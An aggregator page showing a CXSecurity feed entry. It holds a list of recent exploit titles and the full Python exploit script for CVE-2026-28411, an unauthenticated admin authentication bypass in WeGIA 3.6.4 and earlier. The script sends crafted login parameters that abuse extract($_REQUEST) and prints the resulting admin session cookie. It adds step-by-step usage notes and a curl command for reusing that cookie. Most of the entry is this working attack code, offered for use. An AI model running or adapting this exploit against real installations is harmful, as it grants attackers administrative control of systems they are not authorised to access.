惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

人人都是产品经理
人人都是产品经理
博客园_首页
IT之家
IT之家
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
Vercel News
Vercel News
美团技术团队
D
Docker
WordPress大学
WordPress大学
T
Tailwind CSS Blog
酷 壳 – CoolShell
酷 壳 – CoolShell
The Cloudflare Blog
Y
Y Combinator Blog
F
Fortinet All Blogs
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
G
Google Developers Blog
爱范儿
爱范儿
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
月光博客
月光博客
MongoDB | Blog
MongoDB | Blog
S
SegmentFault 最新的问题
GbyAI
GbyAI
Hugging Face - Blog
Hugging Face - Blog
Microsoft Azure Blog
Microsoft Azure Blog
A
About on SuperTechFans

CXSECURITY Database RSS Feed - CXSecurity.com

Langflow 1.3.0 Remote Code Execution Krayin CRM v2.2.x Authenticated Remote Code Execution PraisonAI CodeAgent <= 1.6.77 Remote Code Execution (RCE) via Unsandboxed LLM Code Execution XenForo XSS CVE Scanner — Passive Detection Tool for CVE-2026-35055, CVE-2026-35054, CVE-2026-35057 KNX visualisering - Broken Access Control 7-Zip <= 26.02 - Mark-of-the-Web (MotW) Bypass via RAR5 Alternate Data Stream Name Collision NodeBB <= 4.13.2 ActivityPub attributedTo Local UID Spoof - CXSecurity.com KNX visualisering - Broken Access Control vm2 <= 3.11.3 - NodeVM Builtin Denylist Bypass SiYuan <= 3.5.9 Remote Code Execution via Malicious Bazaar Package Windows Defender (MsMpEng.exe) Race Condition -> LPE / SYSTEM / Use-After-Free -> Crash D-Link DSL2600U rom-0 Admin Password Disclosure KNX visualisering - Broken Access Control PHP Link Directory (phpLD) 2.1.3 - SQL Injection, IDOR, CSRF OpenEMR 7.0.2 Arbitrary File Read ZTE ZXHN H188A V6 Authentication Bypass phpLD 2.1.3 (EOL) has authenticated SQLi in admin/dir_validate.php (CATEGORY_ID) and admin ORDER BY (sort), unauthenticated IDOR in add_reciprocal.php, CSRF on admin link actions via GET, and exposed install/ after deployment. Verified locally on v2.1.3. Tenable Terrascan Server <= v1.18.3 SSRF and Local File Read Lenovo LegionSpace 1.7.11.2 DAService Unquoted Service Path ZTE H298A / H108N Unauthenticated Credential Exposure WordPress Contest Gallery 28.1.4 Unauthenticated Blind SQL Injection BrandIT Consultancy - Blind Sql Injection Association Management Script - Multiple Vulnerabilities (IDOR, SQLi, Stored XSS) Canvas Breach: Symbiotic Dual-Virus Model & Origin Parity Evidence Open ISES Tickets < 3.44.2 - Hardcoded MySQL Credentials ePati Antikor NGFW 2.0.1301 Authentication Bypass Windows Shell LNK Spoofing to NTLMv2 Hash Capture Apache HTTP Server 2.4.66 mod_http2 Double-Free Denial of Service Grav CMS 2.0.0-beta.2 Remote Code Execution
WeGIA <= 3.6.4 Unauthenticated Admin Authentication Bypass
2026-03-08 · via CXSECURITY Database RSS Feed - CXSecurity.com

#!/usr/bin/env python3 # Exploit Title: WeGIA <= 3.6.4 Authentication Bypass to Admin Session # CVE: CVE-2026-28411 # Date: 2026-02-27 # Exploit Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # Author GitHub: # Vendor Homepage: https://github.com/LabRedesCefetRJ/WeGIA # Software Link: https://github.com/LabRedesCefetRJ/WeGIA # Affected: WeGIA <= 3.6.4 # Tested on: WeGIA 3.6.4 # Category: Webapps # Platform: PHP # Exploit Type: Authentication Bypass # CVSS: 9.8 (Critical) # CWE: CWE-288, CWE-473 # Description: Unauthenticated admin login bypass via unsafe extract($_REQUEST) in login.php # Fixed in: 3.6.5 # Usage: # python3 exploit.py <target_url> [--admin-cpf ADMIN_CPF] [--admin-id ADMIN_ID] # # Examples: # python3 exploit.py http://192.168.1.100/WeGIA/html/login.php # python3 exploit.py https://target.com/wegia/html/login.php --admin-cpf admin --admin-id 1 # # Options: # --admin-cpf Known or guessed admin CPF/login (default: admin) # --admin-id Admin user ID to impersonate (default: 1) # # Notes: # - Exploits unsafe extract($_REQUEST) to overwrite login variables # - Sets admin session directly without password check # - After success, returned cookies can be used for full admin access # # How to Use # # Step 1: Run the script against the target login endpoint # Step 2: If successful → copy the PHPSESSID cookie # Step 3: Use cookie in browser or requests to access admin panel # print(r""" ╔════════════════════════════════════════════════════════════════════════════════════════════╗ ║ ║ ║ ▄▄▄▄· ▄▄▄ . ▄▄ • ▄▄▄▄▄ ▄▄▄ ▄▄▄· ▄▄▄· ▄▄▄▄▄▄▄▄▄ .▄▄▄ ▄• ▄▌ ║ ║ ▐█ ▀█▪▀▄.▀·▐█ ▀ ▪•██ ▪ ▀▄ █·▐█ ▀█ ▐█ ▄█•██ ▀▀▄.▀·▀▄ █·█▪██▌ ║ ║ ▐█▀▀█▄▐▀▀▪▄▄█ ▀█ ▐█.▪ ▄█▀▄ ▐▀▀▄ ▄█▀▀█ ██▀· ▐█.▪▐▀▀▪▄▐▀▀▄ █▌▐█· ║ ║ ██▄▪▐█▐█▄▄▌▐█▄▪▐█ ▐█▌·▐█▌.▐▌▐█•█▌▐█ ▪▐▌▐█▪·• ▐█▌·▐█▄▄▌▐█•█▌▐█▄█▌ ║ ║ ·▀▀▀▀ ▀▀▀ ·▀▀▀▀ ▀▀▀ ▀█▄▀▪.▀ ▀ ▀ ▀ .▀ ▀▀▀ ▀▀▀ .▀ ▀ ▀▀▀ ║ ║ ║ ║ b a n y a m e r _ s e c u r i t y ║ ║ ║ ║ >>> Silent Hunter • Shadow Presence <<< ║ ║ ║ ║ Operator : Mohammed Idrees Banyamer Jordan 🇯🇴 ║ ║ Handle : @banyamer_security ║ ║ ║ ║ CVE-2026-28411 • WeGIA Auth Bypass ║ ║ ║ ╚════════════════════════════════════════════════════════════════════════════════════════════╝ """) import argparse import requests import sys from urllib.parse import urljoin def exploit(target_url, admin_cpf="admin", admin_id="1"): session = requests.Session() login_url = urljoin(target_url.rstrip('/') + '/', "login.php") payload = { "cpf": admin_cpf, "c": "true", "id_pessoa": admin_id, } print(f"[*] Targeting: {login_url}") print(f"[*] Using payload: cpf={admin_cpf}, c=true, id_pessoa={admin_id}") try: response = session.post( login_url, data=payload, allow_redirects=False, timeout=10 ) print(f"[*] Status code: {response.status_code}") if response.status_code in (301, 302): location = response.headers.get("Location", "N/A") cookies = session.cookies.get_dict() print("[+] SUCCESS: Authentication bypass appears successful") print(f" Redirect: {location}") print(f" Cookies set: {cookies}") if "PHPSESSID" in cookies: print("\n[+] Admin session cookie obtained!") print(" PHPSESSID =", cookies["PHPSESSID"]) print("\nNext step: Use this cookie to access the admin panel:") print(f" Cookie: PHPSESSID={cookies['PHPSESSID']}") print(f" Example curl:") print(f" curl -b \"PHPSESSID={cookies['PHPSESSID']}\" {urljoin(target_url.rstrip('/') + '/', 'index.php')}") else: print("[-] Failed to bypass authentication") print(f" Response snippet:\n{response.text[:400]}...") except requests.RequestException as e: print(f"[!] Error: {e}") sys.exit(1) if __name__ == "__main__": parser = argparse.ArgumentParser(description="CVE-2026-28411 WeGIA Authentication Bypass Exploit") parser.add_argument("target", help="Target base URL (e.g. http://target.com/WeGIA/)") parser.add_argument("--admin-cpf", default="admin", help="Admin CPF/login to impersonate") parser.add_argument("--admin-id", default="1", help="Admin user ID to set") args = parser.parse_args() exploit(args.target, args.admin_cpf, args.admin_id)